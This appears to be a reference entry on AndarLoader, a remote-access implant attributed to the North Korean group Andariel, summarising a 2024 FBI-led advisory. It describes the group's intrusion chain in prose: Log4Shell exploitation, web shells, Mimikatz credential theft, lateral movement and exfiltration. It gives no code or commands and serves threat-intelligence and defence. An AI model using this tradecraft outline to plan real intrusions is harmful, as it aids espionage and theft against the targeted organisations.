AndarLoader

AndarLoader is a custom malware implant/RAT associated with the DPRK Reconnaissance General Bureau (RGB) 3rd Bureau threat group Andariel, also tracked as Onyx Sleet and formerly as PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. It is listed in a July 2024 joint FBI-led Cybersecurity Advisory as one of multiple Andariel-developed RATs and implants used in the group’s cyber espionage and ransomware operations. The advisory attributes Andariel’s activity to campaigns targeting defense, aerospace, nuclear, and engineering organizations for sensitive military information and intellectual property, with additional targeting of medical and energy sectors; the group has also funded espionage through ransomware operations against U.S. healthcare entities.

Within the advisory, AndarLoader is identified as part of a broader Andariel malware ecosystem used after initial compromise. The actors commonly obtain access by exploiting public-facing web servers and known vulnerabilities, including CVE-2021-44228 (Log4Shell), then deploy web shells, establish persistence via Scheduled Tasks, steal credentials using tools such as Mimikatz, move laterally with SMB and RDP, and exfiltrate data via cloud services or tools such as PuTTY and WinSCP. The advisory states Andariel-developed implants and RATs, including AndarLoader, support capabilities such as arbitrary command execution, keylogging, screenshots, file and directory listing, browser history retrieval, process snooping, and uploading content to command-and-control infrastructure. The actors also use tunneling and proxy tools, disguise command and control within HTTP traffic, and routinely pack late-stage tooling with VMProtect and Themida for evasion.

The provided content does not include AndarLoader-specific indicators of compromise distinct from the broader Andariel advisory, but it does state that the advisory contains hashes, user-agent strings, and YARA rules covering the group’s activity and tooling.